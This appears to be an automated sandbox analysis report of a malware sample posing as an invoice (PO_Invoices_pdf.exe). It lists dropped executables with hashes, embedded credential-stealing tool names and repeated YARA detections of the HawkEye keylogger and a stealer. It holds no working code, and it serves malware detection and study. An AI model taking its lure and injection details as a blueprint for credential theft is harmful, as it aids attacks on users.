                            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\hawkgoods.exe B3D02FD5C69293DB419AC03CDF6396BD5E7765682FB3B2390454D9A52BA2CA88
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\origigoods20.exe 1C7757EE223F2480FBC478AE2ECAF82E1D3C17F2E4D47581D3972416166C54AB
                            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\origigoods40.exe CFAD1E486666FF3FB042BA0E9967634DE1065F1BBD505C61B3295E55705A2A50
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeCode function: String function: 0033BA9D appears 35 times
                            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2164
                            Source: PO_Invoices_pdf.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: I$s#$lT3ssl.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: hawkgoods.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: hawkgoods.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: hawkgoods.exe.5.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                            Source: PO_Invoices_pdf.exeBinary or memory string: OriginalFilename vs PO_Invoices_pdf.exe
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277173827.00000000030A1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPE.dll" vs PO_Invoices_pdf.exe
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameLoginForm.dll6 vs PO_Invoices_pdf.exe
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCMemoryExecute.dll@ vs PO_Invoices_pdf.exe
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameWebBrowserPassView.exeF vs PO_Invoices_pdf.exe
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamemailpv.exe< vs PO_Invoices_pdf.exe
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePhulli.exe0 vs PO_Invoices_pdf.exe
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameyuhttCAxwLFZshSGnwmMrfvGZfDSzxEDrzwk.exe4 vs PO_Invoices_pdf.exe
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameVNXT.exe* vs PO_Invoices_pdf.exe
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameE.exe4 vs PO_Invoices_pdf.exe
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameczzfIDlMOIuCXDkvbHSanvcpuIRYWjNm.exe4 vs PO_Invoices_pdf.exe
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameViottoBinder_Stub.exePADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPAD
                            Source: PO_Invoices_pdf.exe, 00000000.00000002.309980821.0000000009400000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs PO_Invoices_pdf.exe
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeSection loaded: security.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dll
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exeSection loaded: security.dll
                            Source: C:\Users\user\AppData\Local\Temp\origigoods20.exeSection loaded: security.dll
                            Source: PO_Invoices_pdf.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                            Source: 0000001B.00000002.651684392.0000000007F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 00000014.00000002.379809632.0000000005930000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 00000014.00000002.379809632.0000000005930000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 00000025.00000002.619183539.0000000005360000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 00000025.00000002.619183539.0000000005360000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 0000001B.00000002.651227274.0000000007C90000.00000004.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 0000001B.00000000.417887646.0000000000A42000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 0000001B.00000000.417887646.0000000000A42000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 00000006.00000002.383895800.00000000002F2000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 00000006.00000002.398436711.0000000007540000.00000004.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 00000006.00000002.398332656.00000000073F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 0000001A.00000002.433264598.0000000000403000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 0000001B.00000002.636644097.0000000000A42000.00000002.00020000.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 0000001B.00000002.636644097.0000000000A42000.00000002.00020000.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 0000001B.00000002.641318198.00000000031B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 0000001B.00000002.641318198.00000000031B1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 00000000.00000002.277417941.00000000040A8000.00000004.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, type: MEMORYMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 00000005.00000002.287278765.0000000000403000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: dropped/hawkgoods.exe, type: DROPPEDMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPEDMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: dropped/hawkgoods.exe, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: dropped/hawkgoods.exe, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPEDMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: C:\Users\user\AppData\Local\Temp\hawkgoods.exe, type: DROPPEDMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 6.2.hawkgoods.exe.73f0000.10.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 27.2.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 27.2.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 27.2.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 6.2.hawkgoods.exe.7540000.11.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 6.0.hawkgoods.exe.34fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 6.0.hawkgoods.exe.34fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 6.0.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 6.0.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 6.0.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 27.0.hawkgoods.exe.a48208.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 27.0.hawkgoods.exe.a48208.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 27.0.hawkgoods.exe.a48208.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 27.0.hawkgoods.exe.a9fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 27.0.hawkgoods.exe.a9fa72.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 6.2.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 6.2.hawkgoods.exe.2f9c0d.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 27.2.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 27.2.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 27.0.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 27.0.hawkgoods.exe.a49c0d.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 26.2.RegAsm.exe.4031bf.2.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 26.2.RegAsm.exe.4031bf.2.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 26.2.RegAsm.exe.4031bf.2.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 27.2.hawkgoods.exe.a9fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 27.2.hawkgoods.exe.a9fa72.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 27.2.hawkgoods.exe.7c90000.10.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 6.2.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 6.2.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 6.2.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 6.2.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 6.2.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 6.2.hawkgoods.exe.2f0000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 6.0.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 6.0.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 6.0.hawkgoods.exe.2f8208.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 23.2.I$s#$lT3ssl.exe.4158f3f.3.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 5.2.RegAsm.exe.4031bf.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 5.2.RegAsm.exe.4031bf.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 5.2.RegAsm.exe.4031bf.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 27.2.hawkgoods.exe.7f40000.11.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 27.0.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 27.0.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 27.0.hawkgoods.exe.a40000.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 5.2.RegAsm.exe.4031bf.1.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 5.2.RegAsm.exe.4031bf.1.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                            Source: 5.2.RegAsm.exe.4031bf.1.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                            Source: 27.2.hawkgoods.exe.a48208.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = https://creativecommons.org/licenses/by-nc/4.0/
                            Source: 27.2.hawkgoods.exe.a48208.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
